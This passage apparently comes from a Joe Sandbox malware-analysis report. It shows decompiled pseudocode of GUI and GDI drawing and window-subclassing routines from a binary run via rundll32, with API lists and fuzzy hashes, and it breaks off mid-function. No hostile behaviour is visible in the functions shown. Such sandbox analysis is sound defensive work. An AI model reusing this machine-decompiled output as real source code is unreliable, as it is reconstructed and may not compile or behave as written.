                          					_t341 = E027FA3BC( *((intOrPtr*)(_v72 + 0x168)));
                          					_pop(_t453);
                          					E027FE1D0(_t341, _t453);
                          					 *((intOrPtr*)( *_v72 + 0x84))(0x20, 0x20);
                          				}
                          				_t463 = E0280CE70(_v16, 1);
                          				 *((intOrPtr*)(_v16 + 0x2f8)) = _t463;
                          				 *((intOrPtr*)( *_t463 + 0x18))();
                          				 *((intOrPtr*)( *_t463 + 0x68))();
                          				E0280D348(_t463, 1);
                          				E0282D780(_t463, _t381, _v8, _t468);
                          				E0282D110(_t463,  &_v100);
                          				 *((intOrPtr*)( *_t463 + 0x70))();
                          				_v64 = _t468 - _v100.right + _v28;
                          				if(E027D3408(_t463, _t496) != 0) {
                          					_v64 = E0282D154(_v16) - _v64 -  *((intOrPtr*)(_t463 + 0x48));
                          				}
                          				 *((intOrPtr*)( *_t463 + 0x84))(_v100.bottom, _v100.right);
                          				if((_v11 & 0x00000004) == 0) {
                          					__eflags = _v11 & 0x00000001;
                          					if((_v11 & 0x00000001) == 0) {
                          						_v65 = 5;
                          					} else {
                          						_v65 = 0;
                          					}
                          				} else {
                          					_v65 = 2;
                          				}
                          				if((_v11 & 0x00000008) == 0) {
                          					__eflags = _v11 & 0x00000002;
                          					if((_v11 & 0x00000002) == 0) {
                          						_v66 = 2;
                          					} else {
                          						_v66 = 1;
                          					}
                          				} else {
                          					_v66 = 3;
                          				}
                          				_t298 = E0282D154(_v16) - _t381;
                          				_t299 = _t298 >> 1;
                          				if(_t298 < 0) {
                          					asm("adc eax, 0x0");
                          				}
                          				_v60 = _t299;
                          				_t382 = 0;
                          				_v80 = 0x2863958;
                          				_t473 = 0x2863984;
                          				_v84 = 0x28639b0;
                          				do {
                          					_t503 = _t382 - 0xf;
                          					if(_t503 <= 0) {
                          						asm("bt [ebp-0x7], eax");
                          					}
                          					if(_t503 < 0) {
                          						_v76 = E0280E628(_v16, 1, _t463, _t509);
                          						 *((intOrPtr*)( *_v76 + 0x18))();
                          						 *((intOrPtr*)( *_v76 + 0x68))();
                          						E027D6018( *_t473,  &_v116);
                          						E0282D780(_v76, _t382, _v116, _t473);
                          						 *((intOrPtr*)(_v76 + 0x214)) =  *_v84;
                          						_t504 = _t382 - _v65;
                          						if(_t382 == _v65) {
                          							E0280E708(_v76, 1, _t504);
                          						}
                          						if(_t382 == _v66) {
                          							 *((char*)(_v76 + 0x211)) = 1;
                          						}
                          						_t463 =  *_v76;
                          						 *((intOrPtr*)( *_v76 + 0x84))(_v48, _v44);
                          						_v60 = _v60 + _v44 + _v52;
                          						if(_t382 == 0xa) {
                          							_t323 = _v76;
                          							 *((intOrPtr*)(_t323 + 0x124)) = _v16;
                          							 *((intOrPtr*)(_t323 + 0x120)) = 0x2802458;
                          						}
                          					}
                          					_t382 = _t382 + 1;
                          					_v84 = _v84 + 4;
                          					_t473 = _t473 + 4;
                          					_v80 = _v80 + 4;
                          				} while (_t382 != 0xb);
                          				_pop(_t446);
                          				 *[fs:eax] = _t446;
                          				_push(0x2802e2f);
                          				return E027D410C( &_v116, 4);
                          			}

                          APIs
                            • Part of subcall function 028023E0: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0280241D
                            • Part of subcall function 028023E0: CreateFontIndirectA.GDI32(?), ref: 0280242A
                            • Part of subcall function 02802214: GetTextExtentPointA.GDI32(00000000,00000034,00000034,?), ref: 0280224F
                          • MulDiv.KERNEL32(00000008,?,00000004), ref: 02802965
                          • MulDiv.KERNEL32(00000008,?,00000008), ref: 02802975
                          • MulDiv.KERNEL32(0000000A,?,00000004), ref: 02802982
                          • MulDiv.KERNEL32(0000000A,?,00000008), ref: 0280298F
                          • MulDiv.KERNEL32(00000032,?,00000004), ref: 0280299C
                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000000), ref: 02802A0F
                          • MulDiv.KERNEL32(0000000E,?,00000008), ref: 02802A42
                          • MulDiv.KERNEL32(00000004,?,00000004), ref: 02802A52
                          • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 02802A78
                          • DrawTextA.USER32(00000000,00000000,00000001,?,00000000), ref: 02802AB0
                          • LoadIconA.USER32(00000000), ref: 02802C0C
                            • Part of subcall function 0281E19C: GetWindowTextA.USER32(?,?,00000100), ref: 0281E1CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Text$Draw$CreateExtentFontIconIndirectInfoLoadParametersPointRectSystemWindow
                          • String ID: $Image$Message
                          • API String ID: 4220236395-721294388
                          • Opcode ID: 4976d138be8a26e5bcb852554a49b174caa6048a132440e5c1c7bfe54fc779be
                          • Instruction ID: 9c970debe127153f04e4fe0166670e3cffdf4c8b740ffebb39b8d03689a7120b
                          • Opcode Fuzzy Hash: 4976d138be8a26e5bcb852554a49b174caa6048a132440e5c1c7bfe54fc779be
                          • Instruction Fuzzy Hash: 65022879E002089FDB51EFA8C888B9DBBB6EF49304F1481A5E904EB395DB70AD45CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E02805070(intOrPtr __eax, char __edx) {
                          				intOrPtr _v8;
                          				char _v9;
                          				intOrPtr* _v16;
                          				intOrPtr* _v20;
                          				intOrPtr* _v24;
                          				intOrPtr _v28;
                          				char _v44;
                          				char _v60;
                          				void* __edi;
                          				void* __ebp;
                          				signed int _t170;
                          				signed int _t176;
                          				void* _t209;
                          				void* _t213;
                          				intOrPtr _t218;
                          				intOrPtr _t241;
                          				void* _t254;
                          				struct HDC__* _t273;
                          				struct HDC__* _t287;
                          				void* _t327;
                          				void* _t348;
                          				void* _t365;
                          				void* _t372;
                          				intOrPtr _t387;
                          				intOrPtr _t393;
                          				struct HDC__* _t397;
                          				struct HDC__* _t398;
                          				struct HDC__* _t399;
                          				void* _t426;
                          				void* _t427;
                          				void* _t428;
                          				intOrPtr _t452;
                          				intOrPtr _t469;
                          				void* _t483;
                          				int _t491;
                          				int _t496;
                          				void* _t498;
                          				void* _t500;
                          				intOrPtr _t501;
                          				void* _t511;
                          
                          				_t498 = _t500;
                          				_t501 = _t500 + 0xffffffc8;
                          				_v9 = __edx;
                          				_v8 = __eax;
                          				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
                          					_v9 = 0;
                          				}
                          				_t393 =  *((intOrPtr*)(_v8 + 0xc));
                          				if(_t393 != 0xffffffff) {
                          					L24:
                          					return _t393;
                          				} else {
                          					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                          					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
                          						goto L24;
                          					} else {
                          						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                          						asm("cdq");
                          						_t491 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
                          						_t496 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
                          						if( *((intOrPtr*)(_v8 + 8)) == 0) {
                          							_t508 =  *0x2863b80;
                          							if( *0x2863b80 == 0) {
                          								 *0x2863b80 = E02804D68(1);
                          							}
                          							_t387 =  *0x2863b80; // 0x0
                          							 *((intOrPtr*)(_v8 + 8)) = E02804DDC(_t387, _t496, _t491);
                          						}
                          						_v16 = E027FC2CC(1);
                          						 *[fs:eax] = _t501;
                          						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x280561f, _t498);
                          						 *((intOrPtr*)( *_v16 + 0x34))();
                          						E027E9BA4(0, _t491, 0,  &_v44, _t496);
                          						E027F7CA4( *((intOrPtr*)(E027FC894(_v16) + 0x14)), _t491, 0xff00000f, _t491, _t498, _t508);
                          						E027FC05C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
                          						 *((intOrPtr*)( *_v16 + 0x38))();
                          						if(_v9 >=  *(_v8 + 0x20)) {
                          						}
                          						E027E9BA4(0 * _t491, 1 * _t491, 0,  &_v60, _t496);
                          						_t209 = _v9 - 1;
                          						_t511 = _t209;
                          						if(_t511 < 0) {
                          							L14:
                          							_push( &_v60);
                          							_t213 = E027FC894( *((intOrPtr*)(_v8 + 4)));
                          							E027F7FA4(E027FC894(_v16),  &_v44, _t512, _t213);
                          							_t218 =  *((intOrPtr*)(_v8 + 4));
                          							_t513 =  *((char*)(_t218 + 0x38)) - 1;
                          							if( *((char*)(_t218 + 0x38)) != 1) {
                          								 *((intOrPtr*)(_v8 + 0xc)) = E02804D0C( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
                          							} else {
                          								 *((intOrPtr*)(_v8 + 0xc)) = E02804D0C( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t513);
                          							}
                          							goto L23;
                          						} else {
                          							if(_t511 == 0) {
                          								_v24 = 0;
                          								_v20 = 0;
                          								 *[fs:eax] = _t501;
                          								_v24 = E027FC2CC(1);
                          								_v20 = E027FC2CC(1);
                          								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x28055e3, _t498);
                          								 *((intOrPtr*)( *_v20 + 0x6c))();
                          								_t241 = _v8;
                          								__eflags =  *((char*)(_t241 + 0x20)) - 1;
                          								if( *((char*)(_t241 + 0x20)) <= 1) {
                          									 *((intOrPtr*)( *_v24 + 8))();
                          									 *((intOrPtr*)( *_v24 + 0x6c))();
                          									E027F7CA4( *((intOrPtr*)(E027FC894(_v24) + 0x14)),  *_v24, 0, _t491, _t498, __eflags);
                          									_t420 =  *_v24;
                          									 *((intOrPtr*)( *_v24 + 0x40))();
                          									_t254 = E027FC950(_v24);
                          									__eflags = _t254;
                          									if(_t254 != 0) {
                          										E027F74D8( *((intOrPtr*)(E027FC894(_v24) + 0xc)), 0xffffff);
                          										__eflags = 0;
                          										E027FD6F0(_v24, 0);
                          										E027F7CA4( *((intOrPtr*)(E027FC894(_v24) + 0x14)), _t420, 0xffffff, _t491, _t498, __eflags);
                          									}
                          									E027FD6F0(_v24, 1);
                          									_t396 = E027FC894(_v16);
                          									E027F7CA4( *((intOrPtr*)(_t258 + 0x14)), _t420, 0xff00000f, _t491, _t498, __eflags);
                          									E027F80D8(_t258,  &_v44);
                          									E027F7CA4( *((intOrPtr*)(_t258 + 0x14)), _t420, 0xff000014, _t491, _t498, __eflags);
                          									SetTextColor(E027F84EC(_t396), 0);
                          									SetBkColor(E027F84EC(_t396), 0xffffff);
                          									_t273 = E027F84EC(E027FC894(_v24));
                          									BitBlt(E027F84EC(_t396), 1, 1, _t491, _t496, _t273, 0, 0, 0xe20746);
                          									E027F7CA4( *((intOrPtr*)(_t396 + 0x14)), _t420, 0xff000010, _t491, _t498, __eflags);
                          									SetTextColor(E027F84EC(_t396), 0);
                          									SetBkColor(E027F84EC(_t396), 0xffffff);
                          									_t287 = E027F84EC(E027FC894(_v24));
                          									BitBlt(E027F84EC(_t396), 0, 0, _t491, _t496, _t287, 0, 0, 0xe20746);
                          								} else {
                          									_v28 = E027FC894(_v16);
                          									E027FC894(_v20);
                          									E027F7FA4(_v28,  &_v44, __eflags,  &_v60);
                          									E027FD6F0(_v24, 1);
                          									 *((intOrPtr*)( *_v24 + 0x40))();
                          									 *((intOrPtr*)( *_v24 + 0x34))();
                          									E027F7CA4( *((intOrPtr*)(E027FC894(_v20) + 0x14)),  *_v24, 0xffffff, _t491, _t498, __eflags);
                          									_push( &_v60);
                          									_push(E027FC894(_v20));
                          									_t327 = E027FC894(_v24);
                          									_pop(_t426);
                          									E027F7FA4(_t327,  &_v44, __eflags);
                          									E027F7CA4( *((intOrPtr*)(_v28 + 0x14)), _t426, 0xff000014, _t491, _t498, __eflags);
                          									_t397 = E027F84EC(_v28);
                          									SetTextColor(_t397, 0);
                          									SetBkColor(_t397, 0xffffff);
                          									BitBlt(_t397, 0, 0, _t491, _t496, E027F84EC(E027FC894(_v24)), 0, 0, 0xe20746);
                          									E027F7CA4( *((intOrPtr*)(E027FC894(_v20) + 0x14)), _t426, 0x808080, _t491, _t498, __eflags);
                          									_push( &_v60);
                          									_push(E027FC894(_v20));
                          									_t348 = E027FC894(_v24);
                          									_pop(_t427);
                          									E027F7FA4(_t348,  &_v44, __eflags);
                          									E027F7CA4( *((intOrPtr*)(_v28 + 0x14)), _t427, 0xff000010, _t491, _t498, __eflags);
                          									_t398 = E027F84EC(_v28);
                          									SetTextColor(_t398, 0);
                          									SetBkColor(_t398, 0xffffff);
                          									BitBlt(_t398, 0, 0, _t491, _t496, E027F84EC(E027FC894(_v24)), 0, 0, 0xe20746);
                          									_push(E027F7018( *((intOrPtr*)(_v8 + 0x1c))));
                          									_t365 = E027FC894(_v20);
                          									_pop(_t483);
                          									E027F7CA4( *((intOrPtr*)(_t365 + 0x14)), _t427, _t483, _t491, _t498, __eflags);
                          									_push( &_v60);
                          									_push(E027FC894(_v20));
                          									_t372 = E027FC894(_v24);
                          									_pop(_t428);
                          									E027F7FA4(_t372,  &_v44, __eflags);
                          									E027F7CA4( *((intOrPtr*)(_v28 + 0x14)), _t428, 0xff00000f, _t491, _t498, __eflags);
                          									_t399 = E027F84EC(_v28);
                          									SetTextColor(_t399, 0);
                          									SetBkColor(_t399, 0xffffff);
                          									BitBlt(_t399, 0, 0, _t491, _t496, E027F84EC(E027FC894(_v24)), 0, 0, 0xe20746);
                          								}
                          								__eflags = 0;
                          								_pop(_t469);
                          								 *[fs:eax] = _t469;
                          								_push(0x28055ea);
                          								E027D320C(_v20);
                          								return E027D320C(_v24);
                          							} else {
                          								_t512 = _t209 - 0xffffffffffffffff;
                          								if(_t209 - 0xffffffffffffffff < 0) {
                          									goto L14;
                          								}
                          								L23:
                          								_pop(_t452);
                          								 *[fs:eax] = _t452;
                          								_push(0x2805626);
                          								return E027D320C(_v16);
                          							}
                          						}
                          					}
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b507ec345ff6f6d7973229422eab21a3424af964a9c8a15ed97ac142f07321fb
                          • Instruction ID: 544ff1242e377144958d64510a84dc1c6e288905119b95222b2d3a954f398cd6
                          • Opcode Fuzzy Hash: b507ec345ff6f6d7973229422eab21a3424af964a9c8a15ed97ac142f07321fb
                          • Instruction Fuzzy Hash: 42023F74B04109AFDB55EFA8C989E9EBBFAAF48710F1045A5E504EB391CA71ED01CF21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E0280A184(intOrPtr __eax, void* __ebx, void* __esi) {
                          				intOrPtr _v8;
                          				char _v12;
                          				char* _t106;
                          				intOrPtr _t118;
                          				intOrPtr _t119;
                          				intOrPtr* _t133;
                          				long _t140;
                          				intOrPtr _t166;
                          				struct HWND__* _t195;
                          				long _t196;
                          				void* _t198;
                          				void* _t199;
                          				struct HWND__* _t200;
                          				void* _t201;
                          				intOrPtr _t212;
                          				intOrPtr _t214;
                          				intOrPtr _t218;
                          				struct HWND__* _t224;
                          				void* _t225;
                          				struct HWND__* _t226;
                          				struct HWND__* _t227;
                          				void* _t229;
                          				void* _t230;
                          				intOrPtr _t231;
                          
                          				_t229 = _t230;
                          				_t231 = _t230 + 0xfffffff8;
                          				_v12 = 0;
                          				_v8 = __eax;
                          				_push(_t229);
                          				_push(0x280a497);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t231;
                          				E0280E14C(_v8);
                          				_t195 = GetWindow(E02833F7C(_v8), 5);
                          				 *(_v8 + 0x248) = _t195;
                          				_t224 = _t195;
                          				 *(_v8 + 0x270) = _t224;
                          				 *((intOrPtr*)(_v8 + 0x274)) = GetWindowLongA(_t224, 0xfffffffc);
                          				SetWindowLongA( *(_v8 + 0x270), 0xfffffffc,  *(_v8 + 0x278));
                          				if( *((intOrPtr*)(_v8 + 0x289)) - 2 < 0) {
                          					_t200 = GetWindow(GetWindow(E02833F7C(_v8), 5), 5);
                          					if(_t200 != 0) {
                          						if( *((char*)(_v8 + 0x289)) == 1) {
                          							_t227 = _t200;
                          							 *(_v8 + 0x244) = _t227;
                          							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t227, 0xfffffffc);
                          							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
                          							_t200 = GetWindow(_t200, 2);
                          						}
                          						_t226 = _t200;
                          						 *(_v8 + 0x240) = _t226;
                          						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t226, 0xfffffffc);
                          						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
                          					}
                          				}
                          				_t106 =  *0x28644d4; // 0x2865b98
                          				if( *_t106 != 0 &&  *(_v8 + 0x240) != 0) {
                          					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
                          				}
                          				if( *((intOrPtr*)(_v8 + 0x284)) == 0) {
                          					__eflags =  *((intOrPtr*)(_v8 + 0x280));
                          					if(__eflags != 0) {
                          						_t140 = E028203AC( *((intOrPtr*)(_v8 + 0x280)));
                          						PostMessageA(E02833F7C(_v8), 0x402, 0, _t140);
                          					}
                          					E0280A4D0(_v8, _t201,  *((intOrPtr*)(_v8 + 0x28a)), __eflags);
                          					E027D5B38(_v8 + 0x268);
                          					_push(E027D5B38(_v8 + 0x268));
                          					_push(0x280a4a4);
                          					_push(1);
                          					_push(0);
                          					_t118 =  *0x28642dc; // 0x2863918
                          					_push(_t118);
                          					L027E81B8();
                          					_t119 = _v8;
                          					__eflags =  *((intOrPtr*)(_t119 + 0x268));
                          					if( *((intOrPtr*)(_t119 + 0x268)) != 0) {
                          						_t196 = SendMessageA(E02833F7C(_v8), 0x407, 0, 0);
                          						__eflags = _t196;
                          						if(_t196 != 0) {
                          							_t214 = E0280AC5C( *((intOrPtr*)(_v8 + 0x28c)), 1);
                          							__eflags = _t214;
                          							if(_t214 != 0) {
                          								__eflags = _t214;
                          							}
                          							E027D5B50( &_v12, _t214);
                          							_t133 =  *((intOrPtr*)(_v8 + 0x268));
                          							 *((intOrPtr*)( *_t133 + 0xc))(_t133, _t196, _v12, 0, 0);
                          							E0280A664(_v8, _t196, __eflags);
                          						}
                          					}
                          					__eflags = 0;
                          					_pop(_t212);
                          					 *[fs:eax] = _t212;
                          					_push(0x280a49e);
                          					return E027D5B38( &_v12);
                          				} else {
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x20))();
                          					 *((char*)(_v8 + 0x288)) = 1;
                          					 *[fs:eax] = _t231;
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 8))( *[fs:eax], 0x280a39b, _t229);
                          					_t198 = E027EC054( *((intOrPtr*)(_v8 + 0x28c))) - 1;
                          					if(_t198 >= 0) {
                          						_t199 = _t198 + 1;
                          						_t225 = 0;
                          						do {
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x2c))();
                          							_t225 = _t225 + 1;
                          							_t199 = _t199 - 1;
                          						} while (_t199 != 0);
                          					}
                          					E027DD6B4(_v8 + 0x284);
                          					E0282D844(_v8);
                          					_pop(_t218);
                          					 *[fs:eax] = _t218;
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x24))(0x280a3a2);
                          					_t166 = _v8;
                          					 *((char*)(_t166 + 0x288)) = 0;
                          					return _t166;
                          				}
                          			}

                          APIs
                            • Part of subcall function 0280E14C: SendMessageA.USER32(00000000,00000141,?,00000000), ref: 0280E16C
                          • GetWindow.USER32(00000000,00000005), ref: 0280A1B5
                          • GetWindowLongA.USER32(00000000,000000FC), ref: 0280A1D3
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0280A1F7
                          • GetWindow.USER32(00000000,00000005), ref: 0280A21A
                          • GetWindow.USER32(00000000,00000000), ref: 0280A220
                          • GetWindowLongA.USER32(00000000,000000FC), ref: 0280A249
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0280A26D
                          • GetWindow.USER32(00000000,00000002), ref: 0280A275
                          • GetWindowLongA.USER32(00000000,000000FC), ref: 0280A28A
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0280A2AE
                          • SendMessageA.USER32(00000000,000000D3,00000003,00000000), ref: 0280A2DC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Long$MessageSend
                          • String ID:
                          • API String ID: 1593136606-0
                          • Opcode ID: 2dcfb36cc9aa811cb1366df8c62b97abfcad706ff2fa7d49064c6103d4a1bc63
                          • Instruction ID: b67b8e32c233b37c8ac2ad9fb56ef05b816da23747a25a6f76eddc335a8b3299
                          • Opcode Fuzzy Hash: 2dcfb36cc9aa811cb1366df8c62b97abfcad706ff2fa7d49064c6103d4a1bc63
                          • Instruction Fuzzy Hash: 57A1DA78A05604EFDB55EBA8C988F9DB7F5EB08700F6541E0A508EB3A1CB71AE40DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E027FC5C4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				struct HPALETTE__* _v12;
                          				char _v13;
                          				struct tagPOINT _v21;
                          				struct HDC__* _v28;
                          				void* _v32;
                          				struct HPALETTE__* _t78;
                          				signed int _t84;
                          				signed int _t85;
                          				signed int _t86;
                          				char _t87;
                          				void* _t94;
                          				void* _t140;
                          				intOrPtr* _t170;
                          				intOrPtr _t178;
                          				intOrPtr _t182;
                          				intOrPtr _t184;
                          				intOrPtr _t186;
                          				int* _t190;
                          				intOrPtr _t192;
                          				void* _t194;
                          				void* _t195;
                          				intOrPtr _t196;
                          
                          				_t171 = __ecx;
                          				_t194 = _t195;
                          				_t196 = _t195 + 0xffffffe4;
                          				_t190 = __ecx;
                          				_v8 = __edx;
                          				_t170 = __eax;
                          				_t192 =  *((intOrPtr*)(__eax + 0x28));
                          				_t178 =  *0x27fc810; // 0xf
                          				E027F85C0(_v8, __ecx, _t178);
                          				E027FCC40(_t170);
                          				_v12 = 0;
                          				_v13 = 0;
                          				_t78 =  *(_t192 + 0x10);
                          				if(_t78 != 0) {
                          					_v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
                          					RealizePalette( *(_v8 + 4));
                          					_v13 = 1;
                          				}
                          				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
                          				_t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
                          				_pop(_t85);
                          				_t86 = _t85 * _t84;
                          				if(_t86 > 8) {
                          					L4:
                          					_t87 = 0;
                          				} else {
                          					_t171 =  *(_t192 + 0x28) & 0x0000ffff;
                          					if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
                          						_t87 = 1;
                          					} else {
                          						goto L4;
                          					}
                          				}
                          				if(_t87 == 0) {
                          					if(E027FC950(_t170) == 0) {
                          						SetStretchBltMode(E027F84EC(_v8), 3);
                          					}
                          				} else {
                          					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                          					SetStretchBltMode( *(_v8 + 4), 4);
                          					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                          				}
                          				_push(_t194);
                          				_push(0x27fc800);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t196;
                          				if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
                          					E027FCBE0(_t170, _t171);
                          				}
                          				_t94 = E027FC894(_t170);
                          				_t182 =  *0x27fc810; // 0xf
                          				E027F85C0(_t94, _t171, _t182);
                          				if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
                          					StretchBlt( *(_v8 + 4),  *_t190, _t190[1], _t190[2] -  *_t190, _t190[3] - _t190[1],  *(E027FC894(_t170) + 4), 0, 0,  *(_t192 + 0x1c),  *(_t192 + 0x20),  *(_v8 + 0x20));
                          					_pop(_t184);
                          					 *[fs:eax] = _t184;
                          					_push(0x27fc807);
                          					if(_v13 != 0) {
                          						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
                          					}
                          					return 0;
                          				} else {
                          					_v32 = 0;
                          					_v28 = 0;
                          					_push(_t194);
                          					_push(0x27fc795);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t196;
                          					_v28 = E027F88E4(CreateCompatibleDC(0));
                          					_v32 = SelectObject(_v28,  *(_t192 + 0xc));
                          					E027F8A88( *(_v8 + 4), _t170, _t190[1],  *_t190, _t190, _t192, 0, 0, _v28,  *(_t192 + 0x20),  *(_t192 + 0x1c), 0, 0,  *(E027FC894(_t170) + 4), _t190[3] - _t190[1], _t190[2] -  *_t190);
                          					_t140 = 0;
                          					_pop(_t186);
                          					 *[fs:eax] = _t186;
                          					_push(0x27fc7da);
                          					if(_v32 != 0) {
                          						_t140 = SelectObject(_v28, _v32);
                          					}
                          					if(_v28 != 0) {
                          						return DeleteDC(_v28);
                          					}
                          					return _t140;
                          				}
                          			}

                          APIs
                            • Part of subcall function 027FCC40: GetDC.USER32(00000000), ref: 027FCC96
                            • Part of subcall function 027FCC40: GetDeviceCaps.GDI32(00000000,0000000C), ref: 027FCCAB
                            • Part of subcall function 027FCC40: GetDeviceCaps.GDI32(00000000,0000000E), ref: 027FCCB5
                            • Part of subcall function 027FCC40: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,027FB78B,00000000,027FB817), ref: 027FCCD9
                            • Part of subcall function 027FCC40: ReleaseDC.USER32(00000000,00000000), ref: 027FCCE4
                          • SelectPalette.GDI32(?,?,000000FF), ref: 027FC606
                          • RealizePalette.GDI32(?), ref: 027FC615
                          • GetDeviceCaps.GDI32(?,0000000C), ref: 027FC627
                          • GetDeviceCaps.GDI32(?,0000000E), ref: 027FC636
                          • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 027FC669
                          • SetStretchBltMode.GDI32(?,00000004), ref: 027FC677
                          • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 027FC68F
                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 027FC6AC
                          • CreateCompatibleDC.GDI32(00000000), ref: 027FC70C
                          • SelectObject.GDI32(?,?), ref: 027FC721
                          • SelectObject.GDI32(?,00000000), ref: 027FC780
                          • DeleteDC.GDI32(00000000), ref: 027FC78F
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                          • String ID:
                          • API String ID: 2414602066-0
                          • Opcode ID: 6ef32ae21a0a10de50ed1e3a6879a67ae299c5cae93af5ae265ab85a2b967211
                          • Instruction ID: 2480f993b33f26dadbdfface735585476e2d8c76f366ee32cc7f5b90ca65e4a3
                          • Opcode Fuzzy Hash: 6ef32ae21a0a10de50ed1e3a6879a67ae299c5cae93af5ae265ab85a2b967211
                          • Instruction Fuzzy Hash: 86710BB5A08209AFDB92DFA8C989F5ABBFDAB08710F118559B608D7751D734E900CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E027F88F4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                          				void* _v8;
                          				int _v12;
                          				int _v16;
                          				struct HBITMAP__* _v20;
                          				struct HDC__* _v24;
                          				struct HDC__* _v28;
                          				struct HDC__* _v32;
                          				int _v48;
                          				int _v52;
                          				void _v56;
                          				void* _t78;
                          				intOrPtr _t85;
